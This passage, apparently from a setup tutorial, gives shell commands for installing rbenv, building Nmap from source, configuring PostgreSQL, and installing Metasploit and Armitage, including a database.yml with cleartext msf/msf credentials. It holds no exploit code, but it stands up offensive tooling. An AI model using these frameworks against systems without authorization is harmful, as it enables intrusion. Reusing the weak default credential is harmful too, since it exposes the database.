git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo

exec $SHELL

rbenv install 2.3.1
rbenv global 2.3.1
ruby -v

Installing NMAP from source:

Because source is always fun!

mkdir ~/Development
cd ~/Development
svn co https://svn.nmap.org/nmap
cd nmap
./configure
make
sudo make install
make clean

Config PostgreSQL:

sudo -s
su postgres
createuser msf -P -S -R -D
createdb -O msf msf
exit
exit

Now let’s install Metasploit:

cd /opt
sudo git clone https://github.com/rapid7/metasploit-framework.git
sudo chown -R `whoami` /opt/metasploit-framework
cd metasploit-framework
gem install bundler
bundle install
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'

Installing Armitage:

curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage-latest.tgz
sudo tar -xvzf /tmp/armitage.tgz -C /opt
sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage
sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver
sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver

Create the database file for Metasploit:

sudo nano /opt/metasploit-framework/config/database.yml

In database.yml, paste the following as is. The msf/msf credentials must match what you gave createuser above; on anything but a throwaway lab box choose a stronger password, and keep the file readable only by the user running Metasploit, since it holds the database password in cleartext:

production:
 adapter: postgresql
 database: msf
 username: msf
 password: msf
 host: 127.0.0.1
 port: 5432
 pool: 75
 timeout: 5

Lastly, remember to create the environment variable to show Metasploit and Armitage where your database config file is.

sudo sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"

source /etc/profile

Now you may run your Metasploit for the first time.